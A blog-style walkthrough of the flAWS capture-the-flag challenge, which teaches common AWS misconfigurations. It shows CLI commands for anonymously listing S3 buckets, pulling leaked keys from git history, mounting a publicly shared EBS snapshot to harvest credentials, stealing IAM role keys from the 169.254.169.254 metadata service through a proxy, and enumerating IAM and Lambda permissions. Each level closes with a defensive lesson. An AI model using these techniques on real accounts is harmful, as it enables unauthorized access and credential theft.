
flAWS is a fun AWS-based security misconfiguration challenge created by Scott Piper of Summit Route. I started playing around with it here and there in 2020, and decided to document the whole process from beginning to end, since cloud security skills will only become more important in the coming years.

My YouTube Walkthrough #

What’s the point of this? #

I believe the flAWS challenge was created to bring attention to common misconfigurations in the AWS cloud environment. The bulk of the early challenge deals with S3 misconfigurations; there are running lists of S3 bucket leaks stretching from 2013 to 2022. These vulnerabilities leave product and user data easily accessible to attackers and anyone else who would like to use that data for their own ends. Learning how these misconfigurations happen, and raising awareness of the issue, will hopefully prevent some of them, because these leaks can be very damaging to companies and their users.

flAWS Website

Useful Stuff for this challenge #

Level 1: Everyone has access #

The level just reads:

This level is buckets of fun. See if you can find the first sub-domain.

This is probably referring to S3 buckets, since S3 is the AWS storage service, and also the service a lot of companies have gotten into trouble for misconfiguring and leaving open to the internet.

All S3 buckets, when configured for static web hosting, are given an AWS domain you can use to browse to them without setting up your own DNS. In this case, the site can also be visited by going to its S3 website endpoint directly.
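As a sketch of how that endpoint is derived (assuming the challenge bucket is named flaws.cloud, which it must be for the site to work on that custom domain, and that it lives in us-west-2):

```shell
# Deriving an S3 static-website endpoint from a bucket name.
# Assumptions: bucket name flaws.cloud, region us-west-2.
BUCKET="flaws.cloud"
REGION="us-west-2"
# S3 website endpoints follow the pattern <bucket>.s3-website-<region>.amazonaws.com
ENDPOINT="http://${BUCKET}.s3-website-${REGION}.amazonaws.com"
echo "$ENDPOINT"
```

Browsing to that endpoint serves the same content as the custom domain, which is how you confirm the site is really an S3 bucket.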

Use nslookup, host, and/or dig to get more information on the domain #
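A minimal recon sequence, assuming the challenge domain is flaws.cloud (the network lookups are illustrative; their exact output depends on DNS at the time you run them):

```shell
# DNS recon on the challenge domain (assumption: the site lives at flaws.cloud)
DOMAIN="flaws.cloud"
nslookup "$DOMAIN" || true      # resolves to an AWS-owned IP
dig +short "$DOMAIN" || true    # same lookup, terser output
# reverse-resolving one of the returned IPs (nslookup <ip>) comes back as an
# s3-website-us-west-2 hostname, which tells us both the service (S3)
# and the bucket's region (us-west-2)
```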


List the contents of the bucket using aws cli #

aws s3 ls s3:// --region us-west-2
# run the command again without signing the request
aws s3 ls s3:// --region us-west-2 --no-sign-request
  • the --no-sign-request flag tells the CLI not to sign the request or look for credentials when executing the command

Level 1 Solution

Level 1 Secret File

We could also have easily browsed straight to the bucket, since we know this is on S3, read the XML listing, and found the secret file for level 2 there.

The Problem #

This level granted List permissions to Everyone. Don’t open permissions to Everyone; by default, S3 buckets are private.

Level 2: Any authenticated AWS user has access #

The challenge lets us know this level is going to be similar, but we’ll need our own AWS creds.

Level 2 Instructions

Create an IAM user on AWS #

  • I created a user called demonstrata to demonstrate 😅

Create New User

Configure profile on the CLI #

# input access key and access key id when prompted after this configuration command
# probably safe choosing any region
aws configure --profile demonstrata
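Under the hood, `aws configure --profile` just writes INI sections to your credentials and config files. The sketch below reproduces that by hand, using the CLI's real `AWS_SHARED_CREDENTIALS_FILE`/`AWS_CONFIG_FILE` environment variables pointed at temp files so it never touches your actual ~/.aws files; the key values are AWS's documented example placeholders, not real creds:

```shell
# What `aws configure --profile demonstrata` stores, written by hand
# into throwaway files (the access key values below are fake examples).
export AWS_SHARED_CREDENTIALS_FILE="$(mktemp)"
export AWS_CONFIG_FILE="$(mktemp)"

cat > "$AWS_SHARED_CREDENTIALS_FILE" <<'EOF'
[demonstrata]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
EOF

cat > "$AWS_CONFIG_FILE" <<'EOF'
[profile demonstrata]
region = us-west-2
EOF

grep '^\[demonstrata\]' "$AWS_SHARED_CREDENTIALS_FILE" && echo "profile written"
```

With those env vars exported, any `aws --profile demonstrata …` command in the same shell would pick up these files instead of ~/.aws.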

List the contents of the bucket using aws CLI with --profile #

# aws credentialed access
aws s3 --profile demonstrata ls s3://

Level 2 Solution

The Problem #

AWS has removed this setting from the web console, but the SDKs and third-party tools sometimes still allow it.

Don’t open permissions to Any Authenticated AWS User, because that could be any user in the entirety of AWS, not just users in your own account.

Level 3: Keys get leaked in Git History #

The level says that it’s fairly similar to the last, but we’ll be able to find some keys this time. How can we find out what other buckets there are? Hmmm.

Find a git repository #

Use git log to pull old commit history #

  • use git log in the synced directory to pull the git commit history
  • git checkout the first commit
  • find access keys accidentally added to initial commit
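The steps above can be reproduced end to end in a throwaway repo. Everything here is made up for illustration (the repo, the file name, and the key, which is AWS's documented example placeholder); the point is that deleting a file in a later commit does not remove it from history:

```shell
# Demo: "leak" a fake key in the first commit, remove it in the second,
# then recover it straight from git history.
set -e
REPO="$(mktemp -d)"
cd "$REPO"
git init -q
printf 'access_key AKIAIOSFODNN7EXAMPLE\n' > access_keys.txt
git add access_keys.txt
git -c user.email=demo@example.com -c user.name=demo commit -qm "first commit"
git rm -q access_keys.txt
git -c user.email=demo@example.com -c user.name=demo commit -qm "oops, remove keys"
# both commits are still in the log; the file is gone from HEAD but not history
git log --oneline
FIRST=$(git rev-list --max-parents=0 HEAD)   # hash of the initial commit
# read the leaked file out of the old commit (git checkout <hash> works too)
git show "$FIRST:access_keys.txt"
```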

Configure a new AWS CLI profile with creds and see what buckets it can access #

We find the URL to the next level:

The Problem #

I’ve personally found access keys on GitHub before; it’s not uncommon. Yes, devs should be more careful with their commits, but the bigger problem is that the secrets weren’t “rolled”. Access keys and any sort of passwords should be rotated on a regular interval, and when an incident happens, like keys being leaked in a publicly accessible space, those keys should be immediately revoked.

Level 4: Accessing EC2 Instance Snapshots #

Level 4 Instructions

Our goal here is to get access to the EC2 instance hosting this level’s web page.


When we go to the website, it asks for creds we don’t have.

Web Page Access Denied

Identify Account ID of those creds we found in previous level #

aws --profile level3 sts get-caller-identity

I named all my AWS profiles after the level where I found the creds, so level3 holds the creds we found in the last level, but you could name them whatever.

# see all the snapshots owned by this account
aws --profile level3 ec2 describe-snapshots --owner-id 975426262029

Use Get Caller Identity Function

# we can even see more if we run the same cmd without owner id
aws --profile level3 ec2 describe-snapshots

Describe Snapshots
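If you want to grab the account ID programmatically rather than eyeballing the JSON, the CLI's `--query Account --output text` flags do it directly; the sketch below instead parses a mocked-up response locally (the JSON is an illustrative example, with the ARN made up, not captured output):

```shell
# Pulling the account ID out of (mock) get-caller-identity output.
# Real one-liner: aws --profile level3 sts get-caller-identity --query Account --output text
RESPONSE='{
    "UserId": "AIDAEXAMPLEUSERID",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/example-user"
}'
ACCOUNT_ID=$(printf '%s' "$RESPONSE" | sed -n 's/.*"Account": "\([0-9]*\)".*/\1/p')
echo "$ACCOUNT_ID"
```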

Create a Volume for the snapshot #

aws --profile demonstrata ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

Duplicate Snapshot into a Volume
We duplicate the snapshot into a volume in our own AWS account

You have to go into the console in the us-west-2 region. You won’t see the volume in other regions.

Create ec2 instance from Snapshot #

  • simply create an EC2 instance using the snapshot as an added volume
  • important things to configure here are the /dev/sde device name and the delete-on-termination option

Create ec2 from Snapshot

Configure Pem File #

  • download the ssh key and put it in your working folder
  • restrict its permissions
chmod 400 flaws.pem
  • ssh into the instance
ssh -i flaws.pem ubuntu@<your-instance-public-ip>

Mount the Volume #

  • run lsblk to list information about all available block devices
lsblk
  • mount the volume you added - it should be the 8gb one
sudo mount /dev/xvde1 /mnt

Find keys in the Instance #

  • navigate to /mnt/home/ubuntu and find the .sh file
  • use the creds to login

End of Level 4

The Problem #

People sometimes use snapshots to regain access to their own EC2 instances when they forget the passwords. Unfortunately, snapshots shared too broadly also let attackers get access to the same things.

Level 5: The Magic IP & Metadata Service #

The level asks us to use the proxy it provides to figure out how to list the contents of the level6 bucket, which has a hidden directory in it.

  • If we try to go to the URL:

Access Denied

Access the Metadata service at 169.254.169.254 #
  • We find some creds in the metadata
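The general shape of that request looks like the sketch below. The proxy base URL is a placeholder (substitute this level's actual URL); the 169.254.169.254 paths are the standard EC2 instance metadata (IMDSv1) paths:

```shell
# Walking the instance metadata service through the level's proxy.
PROXY="http://<level5-proxy-url>/proxy"   # placeholder, not the real URL
META="169.254.169.254/latest/meta-data"
# listing this path returns the name of the IAM role attached to the instance:
echo "$PROXY/$META/iam/security-credentials/"
# appending the role name returns temporary keys (AccessKeyId,
# SecretAccessKey, Token) for that role:
echo "$PROXY/$META/iam/security-credentials/<role-name>"
# in a real run you'd curl these URLs, e.g.:
#   curl "$PROXY/$META/iam/security-credentials/"
```

Note that the temporary creds include a session token, so the token has to go into the profile too (aws_session_token) for the CLI to accept them.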

Find New Creds

Find Secret Directory

The Problem #

Applications should not proxy requests to 169.254.169.254 or any other local and private IP ranges. IAM roles should be restricted as much as possible.

Level 6: Read-Only? Permission Trouble #

In this level we actually get some keys with the SecurityAudit policy attached to them. But they might be able to do other “things”.

Configure another profile with the keys and figure out what they can do #

aws configure --profile level6
  • figure out which user these keys belong to
aws --profile level6 iam get-user
  • list policies attached to user
aws --profile level6 iam list-attached-user-policies --user-name Level6
Don’t be confused: the CLI profile I configured is “level6”, while the IAM user name happens to be “Level6”.
  • view the policies
aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit --version-id v1
aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

Lambda Functions #

  • list the Lambda functions in the region
aws --region us-west-2 --profile level6 lambda list-functions
  • get policy for lambda
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
  • the policy output shows the function can be executed through an API Gateway with the id s33ppypa75
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
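Once `get-stages` returns a stage name, the invoke URL follows API Gateway's fixed REST pattern. The rest-api-id and region below come from the walkthrough; the stage name is a placeholder for whatever `get-stages` reports:

```shell
# Assembling the API Gateway invoke URL for the discovered API.
REST_API_ID="s33ppypa75"
REGION="us-west-2"
STAGE="<stage-from-get-stages>"   # placeholder
# REST invoke URLs are always https://<id>.execute-api.<region>.amazonaws.com/<stage>/
INVOKE_URL="https://${REST_API_ID}.execute-api.${REGION}.amazonaws.com/${STAGE}/"
echo "$INVOKE_URL"
```

Appending the Lambda's resource path to that URL and visiting it in a browser invokes the Level6 function.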

Level 6 API

End of flAWS

The Problem #

We shouldn’t hand out any permissions liberally, even permissions that only let users read metadata or see what their own permissions are. Information is power. We should remember that when configuring things.

The End #

Final Thoughts #

I’m still thinking about it to be honest… 😂

I think I would like to learn more about understanding lambda functions.
